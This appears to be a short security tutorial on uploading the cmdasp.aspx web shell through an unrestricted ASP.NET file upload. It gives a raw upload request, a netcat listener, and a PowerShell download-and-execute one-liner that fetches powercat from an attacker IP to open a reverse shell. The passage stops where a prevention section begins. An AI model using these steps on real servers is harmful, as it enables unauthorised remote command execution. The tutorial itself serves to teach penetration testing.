Published on March 21, 2025
ASPX stands for "Active Server Page Extended" and is a file used in Microsoft ASP.NET applications. It contains server-side C# code that runs on a Windows web server. When a user accesses an .aspx page, the server processes the embedded code and returns the resulting HTML.
Many web applications allow users to upload files. If the app does not properly restrict file types or validate content, an attacker can upload a malicious .aspx file (web shell). When this file is accessed, it executes commands on the server with the same privileges as the web server process (often SYSTEM).
Use the famous cmdasp.aspx shell. It provides a simple form where you can input system commands and see their output.
This is an example of the raw HTTP request to upload cmdasp.aspx:
POST /vulnerable/upload.aspx HTTP/1.1
Host: target-server
Content-Type: multipart/form-data; boundary=---------------------------71636478919038147531957268791
-----------------------------71636478919038147531957268791
Content-Disposition: form-data; name="ctl00$MainContent$FileUploadControl"; filename="cmdasp.aspx"
Content-Type: application/octet-stream
[Insert full contents of cmdasp.aspx here]
-----------------------------71636478919038147531957268791--Replace the path and form field names as needed depending on the web app structure.
After uploading, go to:
http://target-server/uploads/cmdasp.aspxYou’ll see a form asking for a command. This is the interactive shell.
On your attack machine:
nc -lvnp 4444In the same folder as powercat.ps1:
python3 -m http.server 80In the web shell input, run:
powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.245/powercat.ps1');powercat -c 192.168.45.245 -p 4444 -e powershell"The command downloads and executes the reverse shell, connecting back to your Netcat listener.
This kind of exploit can be prevented by: